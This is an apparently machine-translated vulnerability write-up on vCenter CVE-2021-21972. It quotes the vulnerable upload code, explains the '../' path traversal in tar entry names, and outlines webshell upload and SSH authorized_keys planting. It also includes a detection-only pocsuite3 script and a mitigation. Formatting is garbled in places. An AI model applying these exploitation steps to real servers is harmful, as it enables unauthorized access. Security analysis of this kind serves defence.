Shulou(Shulou.com)05/31 Report--

How to analyze vCenter 6.57.0RCE vulnerabilities CVE-2021-21972, aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

0x01. Introduction of loopholes

VCenter Server is the control center of ESXi that uniformly manages all vSphere hosts and virtual machines in the data center from a single control point.

CVE-2021-21972 is an unauthorized file upload vulnerability in Vcenter. The vulnerability can upload files to any location on the vcenter server. Because of the System permission of the service, you can write at will, upload webshell and execute it. If it is a Linux environment and open ssh, you can upload the public key and log in directly through ssh.

0x02. Loophole analysis

The API of vCenter Server's vROPS plug-in is written in spring. Some sensitive APIs are not authenticated, and the uploadova API has a function of uploading OVA files:

@ RequestMapping (value = {"/ uploadova"}, method = {RequestMethod.POST}) public void uploadOvaFile (@ RequestParam (value = "uploadFile", required = true) CommonsMultipartFile uploadFile, HttpServletResponse response) throws Exception {logger.info ("Entering uploadOvaFile api"); int code = uploadFile.isEmpty ()? 400: 200; PrintWriter wr = null;... Response.setStatus (code); String returnStatus = "SUCCESS"; if (! uploadFile.isEmpty ()) {try {logger.info ("Downloading OVA file has been started"); logger.info ("Size of the file received:" + uploadFile.getSize ()); InputStream inputStream = uploadFile.getInputStream () File dir = new File ("/ tmp/unicorn_ova_dir"); if (! dir.exists ()) {dir.mkdirs ();} else {String [] entries = dir.list (); String [] var9 = entries; int var10 = entries.length For (int var11 = 0; var11 < var10; + + var11) {String entry = var9 [var11]; File currentFile = new File (dir.getPath (), entry); currentFile.delete ();} logger.info ("Successfully cleaned: / tmp/unicorn_ova_dir") } TarArchiveInputStream in = new TarArchiveInputStream (inputStream); TarArchiveEntry entry = in.getNextTarEntry (); ArrayList result = new ArrayList (); while (entry! = null) {if (entry.isDirectory ()) {entry = in.getNextTarEntry () } else {File curfile = new File ("/ tmp/unicorn_ova_dir", entry.getName ()); File parent = curfile.getParentFile (); if (! parent.exists ()) {parent.mkdirs ()

The goal is to unzip the TAR file and upload it to the / tmp/unicorn_ova_dir directory, and directly concatenate the tar file name with / tmp/unicorn_ova_dir and write it to the file.

So the file name contains.. / bypass the current directory limit and upload the file to any location.

In general, you can write JSP webshell files on the target server (the service is System permission, you can write any file), using the tool https://github.com/NS-Sp4ce/CVE-2021-21972.

If the environment is Linux and ssh is open, you can create a tar file containing.. /.. / home/vsphere-ui/.ssh/authorized_keys and upload it, and log in through ssh:

$ssh 10.211.55.4-lvsphere-uiVMware vCenter Server 7.0.1.00100Type: vCenter Server with an embedded Platform Services Controllervsphere-ui@bogon [~] $iduid=1016 (vsphere-ui) gid=100 (users) groups=100 (users), 59001 (cis) 0x03 to detect the exact size of the python# coding: utf-8from urllib.parse import urljoinfrom pocsuite3.api import POCBase, Output, register_poc, logger Requestsclass DemoPOC (POCBase): vulID =''version =' 1.0' author = [''] vulDate = '2021-02-24' createDate =' 2021-02-24' updateDate = '2021-02-24' references = [''] name = 'VMware vCenter unauthorized RCE vulnerability' appPowerLink =''appName =' VMware vCenter' appVersion = '7.0 before U1c, version 6.7 before 6.7U3l, Version 6.5 prior to U3n 'vulType =' 'desc =' 'VMware vCenter unauthorized RCE vulnerability' 'samples = [''] install_requires = [''] def _ verify (self): result = {} try: vul_url = urljoin (self.url) "/ ui/vropspluginui/rest/services/uploadova") resp1 = requests.get (self.url) resp2 = requests.get (vul_url) if'/ vsphere-client' in resp1.text and resp2.status_code = 405: result ['VerifyInfo'] = {} result [' VerifyInfo'] ['URL'] = self.url except Exception as e: Logger.error (e) return self.parse_output (result) def _ attack (self): return self._verify () def parse_output (self Result): output = Output (self) if result: output.success (result) else: output.fail ('Internet nothing returned') return outputregister_poc (DemoPOC) 0x04 repair method

The vmware repair method is relatively simple, just close the plug-in.

This is the answer to the question on how to analyze vCenter 6.57.0 RCE vulnerabilities CVE-2021-21972. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.